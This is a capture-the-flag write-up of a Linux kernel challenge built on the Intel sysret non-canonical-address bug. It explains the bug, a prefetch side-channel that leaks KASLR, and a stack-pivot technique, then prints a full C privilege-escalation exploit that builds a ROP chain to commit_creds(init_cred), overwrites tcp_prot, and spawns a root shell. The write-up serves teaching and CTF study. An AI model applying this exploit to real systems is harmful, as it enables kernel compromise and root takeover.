Sysruption was a hardware, micro-architectural, and kernel exploitation challenge I wrote for corCTF 2023. It is my personal favorite challenge for this CTF as it tied closely into my first µarch CVE (EntryBleed), showcased the applicability of a µarch attack in a realistic exploit, and was built on the premise of a real hardware bug.
This bug has reappeared multiple times over the years, manifesting first in CVE-2006-0744. It subsequently returned to haunt systems in CVE-2012-0217, affecting FreeBSD, the Xen hypervisor, Solaris, Windows 7, and many other operating systems - people have documented their exploits for different OSes, such as this one for FreeBSD and this one for the Xen hypervisor. To my knowledge, the last publicly known time this bug came back was in CVE-2014-4699 on Linux. Since 2014 was before the era of modern kernel mitigations like KASLR, and the previous writeup targeted a system without SMAP and with a writable IDT, the premise of this challenge became exploiting this bug on a modern Linux system with standard hardening features. Before I continue, a huge shout-out must go to zolutal for first-blooding this challenge - he has a really amazing writeup for it!
I first heard about this bug in MIT’s 6.888 Secure Hardware Design Course, which also taught me about the prefetch attack that inspired EntryBleed through their lab assignments (along with other cool labs like Spectre, Rowhammer, L2 prime and probe, and RISC-V CPU fuzzing). So what exactly is this sysret bug?
According to Intel, this is not a bug (but a feature?) - it’s the software developer’s fault for not carefully reading the documentation. To quote the SDM:
SYSRET is a companion instruction to the SYSCALL instruction. It returns from an OS system-call handler to user code at privilege level 3. It does so by loading RIP from RCX and loading RFLAGS from R11. With a 64-bit operand size, SYSRET remains in 64-bit mode; otherwise, it enters compatibility mode and only the low 32 bits of the registers are loaded.
As the documentation then proceeds to state, if the RCX address is non-canonical, then a general protection fault happens in ring 0, so the exception handler in ring 0 runs. In contrast, AMD has the fault happen in userland (which would then crash the process in ring 3). By having a general protection fault happen in a syscall return sequence where all the userland registers have been restored (including the stack pointer) at ring 0, the exception handler will happily start saving the current CPU state with the restored stack pointer, effectively giving us an arbitrary write vulnerability using the pre-exception register state.
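To make the write primitive a bit more concrete, here is a minimal model of where the hardware exception frame lands, assuming the #GP is delivered in 64-bit mode without a stack switch (same privilege level, no IST entry). In that case the CPU aligns the current RSP down to 16 bytes and pushes SS, RSP, RFLAGS, CS, RIP, and the error code. The names `gp_frame_addrs` and `gp_frame_for` are made up for this sketch and are not kernel code; the kernel's entry code then pushes the general-purpose registers below this frame.

```c
#include <assert.h>
#include <stdint.h>

/* Addresses of the six 8-byte slots the CPU writes for a #GP frame. */
struct gp_frame_addrs {
    uint64_t ss, rsp, rflags, cs, rip, error_code;
};

/*
 * Model only: given the (attacker-chosen) RSP that was restored before
 * sysret, compute where each hardware-pushed value is written.
 */
static struct gp_frame_addrs gp_frame_for(uint64_t restored_rsp)
{
    /* In 64-bit mode the CPU aligns the stack to 16 bytes first. */
    uint64_t top = restored_rsp & ~0xfULL;
    assert(top >= 48); /* keep the model from wrapping around zero */

    struct gp_frame_addrs f = {
        .ss         = top - 8,
        .rsp        = top - 16,
        .rflags     = top - 24,
        .cs         = top - 32,
        .rip        = top - 40,
        .error_code = top - 48,
    };
    return f;
}
```

In other words, pointing the restored RSP just above a target makes the CPU and the entry code write the pre-exception register state downward over it, which is why the choice of stack address matters so much later on.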
To bring back this bug, I made the following patch, on kernel 6.3.4.
--- orig_entry_64.S
+++ linux-6.3.4/arch/x86/entry/entry_64.S
 	ALTERNATIVE "shl $(64 - 48), %rcx; sar $(64 - 48), %rcx", \
 		"shl $(64 - 57), %rcx; sar $(64 - 57), %rcx", X86_FEATURE_LA57
 #else
-	shl	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
-	sar	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
+	# shl	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
+	# sar	$(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx
 #endif
 
 	/* If this changed %rcx, it was not canonical */
-	cmpq	%rcx, %r11
-	jne	swapgs_restore_regs_and_return_to_usermode
+	# cmpq	%rcx, %r11
+	# jne	swapgs_restore_regs_and_return_to_usermode
 
 	cmpq	$__USER_CS, CS(%rsp)		/* CS must match SYSRET */
 	jne	swapgs_restore_regs_and_return_to_usermode
This effectively reverts a precise check for non-canonical addresses introduced by this patch.
How exactly do we trigger this bug? The 2014 CVE PoC is still applicable in this case, and I borrowed it with a few slight modifications. The PoC chains ptrace and fork calls to modify the registers such that the grandchild task attempts to return to a non-canonical address upon sysret. A canonical address is simply one where every bit from bit 63 down to the highest virtual address bit the CPU implements (bit 47 with 4-level paging, bit 56 with LA57) is identical, all 1s or all 0s (hence the shl and sar usage in the original check). I was actually surprised that this still worked, as Linux introduced a patch to force irets for this chain of ptrace usage. Fortunately for us, this was removed in a subsequent patch once the stronger check before sysret was introduced.
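The shl/sar trick from the removed check can be sketched in C as follows. This is an illustration only, not the kernel's code: `is_canonical` is a hypothetical helper, and it relies on GCC/Clang performing an arithmetic right shift on signed values (which is implementation-defined in standard C).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/*
 * Returns true if addr is canonical for a CPU with va_bits of virtual
 * address space (48 for 4-level paging, 57 for LA57).
 */
static bool is_canonical(uint64_t addr, unsigned va_bits)
{
    assert(va_bits >= 1 && va_bits <= 64);
    unsigned shift = 64 - va_bits;

    /* shl drops the upper bits, sar sign-extends from bit va_bits - 1. */
    uint64_t extended = (uint64_t)((int64_t)(addr << shift) >> shift);

    /* If sign extension changed the value, it was not canonical. */
    return extended == addr;
}
```

With this helper, the address the exploit later places in RCX, 0x8fffffffffff1337, is rejected for both 48-bit and 57-bit address spaces, while ordinary userland and kernel addresses pass.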
Unlike the 2014 PoC, the Linux kernel now comes with KASLR. This is where the second main component of my challenge comes in - a micro-architectural (or µarch) attack. In my opinion, and from talking to some people working in the VR industry, µarch attacks are often overlooked when developing exploits. Since Spectre and Meltdown, a flurry of new research into similar attacks started in academia, many of which are really fascinating and reveal just how crazy modern hardware is. While some work pretty well and would definitely be applicable in the real world, there are also many that really only work in pristine, noiseless lab conditions on specific system configurations, topped off with extremely low side-channel leakage rates. Perhaps it’s these latter attacks that cause real-world exploit developers to often shrug off this vector of attack.
As documented in my EntryBleed attack against KPTI, and ProjectZero’s writeup for CVE-2022-42703, the prefetch µarch attack from Daniel Gruss is one of those attacks that are extremely fast and accurate at leaking something sensitive (in this case, KASLR). Please refer to those links for more information regarding how the attack works.
Note that the kernel is running without KPTI, so you can also reliably leak other sections of kernel memory aside from text and data (a limitation of EntryBleed). This isn’t me making the challenge easier though - when the Linux kernel detects that a CPU is hardware-mitigated against Meltdown, KPTI is not enabled by default. This is certainly a strange choice (though probably for the sake of performance), as Meltdown is not the only type of µarch attack that can break KASLR based on the shared page-table scheme. Regardless, this is perfect for this challenge as I ran it on a dedicated Cascade Lake server, so KPTI would be disabled by default.
The exploitation strategy from here should be to use a prefetch attack to leak the kernel base address, and then choose a target to overwrite in writable kernel image sections. But an immediate issue arises: when executing sysret, the kernel is already using the userland GS register due to the preceding swapgs instruction.

The GS register is vital to per-CPU data referencing in the kernel - in fact, when the GPF handler executes with an invalid GS base, it repeatedly page faults until the system gives up and panics. This is because these handlers attempt to access memory at offsets from the GS register. The exception handler in error_entry will only manually switch to a kernel GS if the exception came from userland.

Like Zolutal, I first attempted to control the userland GS register with prctl, but the kernel checks that it is in the userland address range. There also really isn’t a way for me to find something in kernel data or text to act as a fake gsbase either. Luckily, x86_64 has had the fsgsbase extension for a while now, which “allows applications to directly write to the FS and GS segment registers.”
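As a rough sketch of what using fsgsbase from userland looks like, the helper below checks whether the kernel advertises the feature and then round-trips a value through the GS base. It assumes x86_64 Linux, where the kernel reports usable FSGSBASE through the `HWCAP2_FSGSBASE` bit of `AT_HWCAP2`; the function name `gsbase_roundtrip` is hypothetical, and on any other platform the sketch simply reports the feature as unavailable.

```c
#include <assert.h>
#include <stdint.h>
#if defined(__x86_64__) && defined(__linux__)
#include <sys/auxv.h>
#endif

#ifndef HWCAP2_FSGSBASE
#define HWCAP2_FSGSBASE (1 << 1) /* bit from the kernel's x86 uapi hwcap2.h */
#endif

/*
 * Writes `value` to the GS base, reads it back into *readback, and then
 * restores the previous GS base. Returns 0 on success, or -1 if the
 * instructions are not usable here (they would raise #UD).
 */
static int gsbase_roundtrip(uint64_t value, uint64_t *readback)
{
    assert(readback != 0);
#if defined(__x86_64__) && defined(__linux__)
    if (!(getauxval(AT_HWCAP2) & HWCAP2_FSGSBASE))
        return -1;

    uint64_t saved;
    __asm__ volatile("rdgsbase %0" : "=r"(saved));
    __asm__ volatile("wrgsbase %0" : : "r"(value));
    __asm__ volatile("rdgsbase %0" : "=r"(*readback));
    __asm__ volatile("wrgsbase %0" : : "r"(saved));
    return 0;
#else
    (void)value;
    return -1;
#endif
}
```

The relevant design point is that wrgsbase only requires the value to be canonical, so unlike the prctl path nothing stops userland from loading a kernel address into its own GS base.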
Now we need to leak gsbase. It’s in physmap at a constant offset (I believe that the first percpu chunk always piggy backs off of the linear direct physical mapping according to comments, so the offset would be RAM dependent?). In my exploit, I leaked physmap base by side-channeling the possible range of physmap addresses according to Linux documentation, and applying a mask to the first leaked address before adding the correct offset to gsbase. This approximation has never failed for me yet.
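The mask-and-offset arithmetic can be sketched as below. The constants are the ones that appear in my exploit's main function and are specific to the challenge machine's RAM layout; the helper name `gsbase_from_physmap_leak` and the example leak value in the note afterwards are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define GIB             (1ULL << 30)
#define LEAK_BIAS       0x100000000ULL /* first hit sits this far above physmap base */
#define CPU0_GSBASE_OFF 0x13bc00000ULL /* cpu 0 gsbase offset on the challenge box */

/*
 * Round the first physmap hit down to a 1 GiB boundary, step back to the
 * physmap base, then add the machine-specific offset of cpu 0's gsbase.
 */
static uint64_t gsbase_from_physmap_leak(uint64_t first_hit)
{
    uint64_t aligned = first_hit & ~(GIB - 1);
    assert(aligned >= LEAK_BIAS); /* guard the subtraction below */
    return aligned - LEAK_BIAS + CPU0_GSBASE_OFF;
}
```

For instance, a made-up first hit of 0xffff888100123000 would be rounded down to 0xffff888100000000 and mapped to a gsbase of 0xffff88813bc00000, which matches the default `curr_cpu_gsbase` value hardcoded in the exploit.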
Looking back on the output of my side-channel, I didn’t even need to leak physmap to get cpu 0’s gsbase. As this address comes after the linear direct physical mapping and is frequently used, it would likely always be the last address in the physmap range to be side-channeled out of the TLB via a prefetch attack, as this is a one-core system. Of course, this would mean that the increment for virtual addresses in the side-channel has to align with this gsbase address, which mine did.
With all the leaks now, I presumed that exploitation would be trivial, and first went for common targets like modprobe_path.

Unfortunately, the exception handler seemed to really trash the stack, writing around 0x860 bytes of data based on my debugging when I had it target the CEA region. This causes a lot of important things to be overwritten, and leaves the kernel in a highly unstable state that usually results in a panic quite quickly. Zolutal actually managed to get this working, and he discusses how he achieved this in his writeup.

What ended up working for me were function pointers in tcp_prot, a technique borrowed from an exploit for CVE-2022-29582. setsockopt then provided me enough register control to stack pivot to another ROP chain (which I wrote ahead of time at an offset from kernel gsbase in a previous trigger of the sysret bug) and escalate privileges to root.

Originally, I enabled oops=panic and aimed to have players disable that setting in the first iteration of the sysret bug to continue exploitation, as the general protection fault would lead to an oops. I wasn’t able to achieve it due to how the GPF handler trashed the stack, but if Zolutal managed to get the modprobe_path overwrite working, then this might be feasible too.
The following is my exploit and its successful exploitation of the challenge:
#define _GNU_SOURCE
#include <fcntl.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * THRESHOLD, POTENTIAL_END, KERNEL_BOTTOM, KERNEL_TOP, KERNEL_STEP,
 * PHYSMAP_BOTTOM, PHYSMAP_TOP and PHYSMAP_STEP must be #defined here;
 * their values are not shown in this listing.
 */

void pfail(char *str)
{
    perror(str);
    _exit(-1);
}

int assign_to_core(int core_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(core_id, &mask);
    if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0)
        pfail("sched_setaffinity");
    return 0;
}

// time a pair of prefetches on addr, in TSC cycles
uint64_t sidechannel(uint64_t addr)
{
    uint64_t a, b, c, d;
    // outputs are early-clobber: they are written before addr is consumed
    asm volatile (".intel_syntax noprefix;"
        "mfence;"
        "rdtscp;"
        "mov %0, rax;"
        "mov %1, rdx;"
        "xor rax, rax;"
        "lfence;"
        "prefetchnta qword ptr [%4];"
        "prefetcht2 qword ptr [%4];"
        "xor rax, rax;"
        "lfence;"
        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;"
        "mfence;"
        ".att_syntax;"
        : "=&r" (a), "=&r" (b), "=&r" (c), "=&r" (d)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx");
    a = (b << 32) | a;
    c = (d << 32) | c;
    return c - a;
}

// #define ITERATIONS 1
// this needs to be fine tuned to work best for the gsbase and kbase leak
// 8 gb more than enough
int threshold = THRESHOLD;

// return the first address in [scan_start, scan_end) whose prefetch time beats the threshold
uint64_t prefetch_leak(uint64_t scan_start, uint64_t scan_end, uint64_t step)
{
    uint64_t size = (scan_end - scan_start) / step;
    uint64_t *data = calloc(size, sizeof(uint64_t));
    uint64_t min = ~0, addr = ~0, potential_end = 0;

    do {
        bool set = false;
        for (uint64_t idx = 0; idx < size; idx++) {
            uint64_t test_addr = scan_start + idx * step;
            if (potential_end && test_addr > potential_end)
                break;
            syscall(104);
            uint64_t time = sidechannel(test_addr);
            if (time < threshold) {
                printf("%lx %lu\n", test_addr, time);
                data[idx]++;
                if (!potential_end)
                    potential_end = test_addr + POTENTIAL_END;
            }
        }
        for (uint64_t i = 0; i < size; i++) {
            if (!set && data[i] >= 1) {
                addr = scan_start + i * step;
                set = true;
            }
        }
    } while (addr == ~0);

    free(data);
    return addr;
}

uint64_t kbase = 0xffffffff81000000ull;
uint64_t curr_cpu_gsbase = 0xffff88813bc00000ull;

// offsets from kernel base, rebased in main once kbase is leaked
uint64_t trampoline = 0xffffffff81a00ee1ull - 0xffffffff81000000ull;
uint64_t pop_rsp = 0xffffffff811083d0ull - 0xffffffff81000000ull;
uint64_t pop_rsp_rsi = 0xffffffff81514860ull - 0xffffffff81000000ull;
uint64_t push_rcx_jmp_ptr_rcx = 0xffffffff8136b694ull - 0xffffffff81000000ull;
uint64_t pop_rsi_rdi_rbp = 0xffffffff81f006d9ull - 0xffffffff81000000ull;
uint64_t pop_rdi_rcx = 0xffffffff81cda0b8ull - 0xffffffff81000000ull;
uint64_t pop_rdi = 0xffffffff811d63f3ull - 0xffffffff81000000ull;
uint64_t tcp_prot = 0xffffffff82160180ull - 0xffffffff81000000ull;
uint64_t commit_creds = 0xffffffff8109b810ull - 0xffffffff81000000ull;
uint64_t init_cred = 0xffffffff8203ade0ull - 0xffffffff81000000ull;

void nopper(struct user_regs_struct *regs) {}

void overwrite_ioctl(struct user_regs_struct *regs)
{
    regs->r9 = push_rcx_jmp_ptr_rcx;
}

void *stack_addr = NULL;

void win()
{
    int fd = open("/root/flag.txt", O_RDONLY);
    char buf[300];
    int n = read(fd, buf, sizeof(buf));
    write(1, buf, n);
    puts("r000000000t");
    system("/bin/sh");
}

// landing pad after the ROP chain returns to userland: restore a sane stack, then call win
__attribute__((naked)) void escaped_from_hell()
{
    asm volatile(
        ".intel_syntax noprefix;"
        "lea rsp, qword ptr [rip + stack_addr];"
        "mov rsp, qword ptr [rsp];"
        "mov rax, 0xff;"
        "not rax;"
        "and rsp, rax;"
        "push rax;"
        "call win;"
        ".att_syntax;"
        :::);
}

void trigger_sysret_bug(uint64_t stack, void (*setup_regs)(struct user_regs_struct *reg))
{
    struct user_regs_struct regs;
    int status;
    pid_t chld;

    if ((chld = fork()) < 0) {
        perror("fork");
        exit(1);
    }

    if (chld == 0) {
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
            perror("PTRACE_TRACEME");
            exit(1);
        }
        raise(SIGSTOP);
        // if ptrace set regs too many at once, simply just fails and never triggers sysret bug
        // not sure why this is the case, so set registers before ptrace
        asm volatile(
            ".intel_syntax noprefix;"
            "mov r14, qword ptr [pop_rsp_rsi];"
            "mov r13, qword ptr [pop_rdi];"
            "mov r12, qword ptr [init_cred];"
            "mov rbp, qword ptr [commit_creds];"
            "mov rbx, qword ptr [trampoline];"
            "mov r11, 0xdeadbeef;"
            "mov r10, 0xbaadf00d;"
            "lea r9, qword ptr [rip + escaped_from_hell];"
            "mov r8, 0x33;"
            // no need for stack, we can restore in naked function in asm, otherwise interfere with rax
            "mov rdx, 0x2b;"
            "mov rax, 57;"
            "syscall;"
            "ud2;"
            ".att_syntax;":::);
    }

    waitpid(chld, &status, 0);
    ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
    ptrace(PTRACE_CONT, chld, 0, 0);
    waitpid(chld, &status, 0);

    ptrace(PTRACE_GETREGS, chld, NULL, &regs);
    regs.rcx = 0x8fffffffffff1337;
    regs.rip = 0x8fffffffffff1337;
    regs.rsp = stack;
    setup_regs(&regs);
    ptrace(PTRACE_SETREGS, chld, NULL, &regs);

    ptrace(PTRACE_CONT, chld, 0, 0);
    ptrace(PTRACE_DETACH, chld, 0, 0);
    exit(0);
}

int main(int argc, char **argv)
{
    assign_to_core(0);
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (argc == 2)
        threshold = atoi(argv[1]);

    // current threshold causes it to leak etext
    uint64_t kbase = prefetch_leak(KERNEL_BOTTOM, KERNEL_TOP, KERNEL_STEP) - 0xc00000;
    uint64_t curr_cpu_gsbase = (prefetch_leak(PHYSMAP_BOTTOM, PHYSMAP_TOP, PHYSMAP_STEP) & ~((1ull<<30) - 1)) - 0x100000000 + 0x13bc00000;
    uint64_t evil_stack = curr_cpu_gsbase + 0x860;
    printf("kbase: 0x%lx\n", kbase);
    printf("current cpu gsbase: 0x%lx\n", curr_cpu_gsbase);

    stack_addr = &fd;
    trampoline += kbase;
    pop_rsp += kbase;
    pop_rsp_rsi += kbase;
    push_rcx_jmp_ptr_rcx += kbase;
    pop_rsi_rdi_rbp += kbase;
    pop_rdi_rcx += kbase;
    pop_rdi += kbase;
    tcp_prot += kbase;
    commit_creds += kbase;
    init_cred += kbase;
    printf("stack pivot: 0x%lx\n", push_rcx_jmp_ptr_rcx);

    asm volatile(
        ".intel_syntax noprefix;"
        "mov rax, %0;"
        "wrgsbase rax;"
        ".att_syntax;"::"r"(curr_cpu_gsbase):"rax");
    puts("calling wrgsbase");

    puts("writing rop chain into current cpu gs base");
    // write rop chain to gs base first
    if (fork() == 0)
        trigger_sysret_bug(evil_stack, &nopper);
    wait(NULL);
    sleep(1);

    evil_stack = tcp_prot + 0xb8;
    // overwrite ioctl in tcp proto
    puts("overwriting tcp_prot func pointers");
    if (fork() == 0)
        trigger_sysret_bug(evil_stack, &overwrite_ioctl);
    wait(NULL);
    sleep(1);
    getchar();

    // target setsockopt func ptr
    puts("triggering ROP");
    setsockopt(fd, SOL_TCP, TCP_ULP, (void *)(curr_cpu_gsbase + 0x7c0), 0x1337);
    puts("hi");
}
One interesting thing noticeable in the exploit is my adjusted strategy for prefetching. In my original EntryBleed PoC, I used simple averages. After doing a lot more micro-architectural attacks in the past year, I believe scoring leak candidates through a threshold system is a much better strategy and less susceptible to extreme outliers that would skew averaging. This threshold would be different across different CPUs, but would not be difficult to enumerate. Sometimes, the leak in my exploit is wrong (especially for kernel base), but I hypothesize that the accuracy could be improved if I performed a ton of memory accesses beforehand to help flush the TLB a bit more.
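To illustrate why I prefer thresholds over averages, here is a small, self-contained sketch that scores a set of timing samples both ways. The helper names `score_hits` and `mean_cycles` are hypothetical and simplified relative to the exploit, and any cycle counts you feed them are up to you; nothing here is measured data.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Threshold scoring: count samples fast enough to look like a mapped page. */
static unsigned score_hits(const uint64_t *samples, size_t n, uint64_t threshold)
{
    assert(samples != NULL);
    unsigned hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (samples[i] < threshold)
            hits++;
    }
    return hits;
}

/* Averaging: a single huge outlier (e.g. an interrupt) dominates the result. */
static uint64_t mean_cycles(const uint64_t *samples, size_t n)
{
    assert(samples != NULL && n > 0);
    uint64_t sum = 0;
    for (size_t i = 0; i < n; i++)
        sum += samples[i];
    return sum / n;
}
```

Take a made-up mapped candidate with samples {30, 32, 31, 5000} and an unmapped one with {60, 62, 61, 63}. Averaging makes the mapped address look far slower (1273 versus 61 cycles), whereas a threshold of 45 cycles gives it three hits against zero, so one noisy measurement no longer flips the ranking.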
This concludes my writeups for corCTF 2023! Feel free to ask any questions about this or point out any mistakes. I hope people had a lot of fun with sysruption, especially as it combined a hardware quirk, a µarch attack, and a kernel exploit in one challenge as the description mentioned 😉. Congrats once again to Zolutal for the first blood, and to sampriti and team Balsn for second and third bloods, and thanks again to 6.888 for inspiring the components for this challenge!
Great. But how is the address range for side channel attacks determined?
The probability of leaking the correct phy_base seems to be very low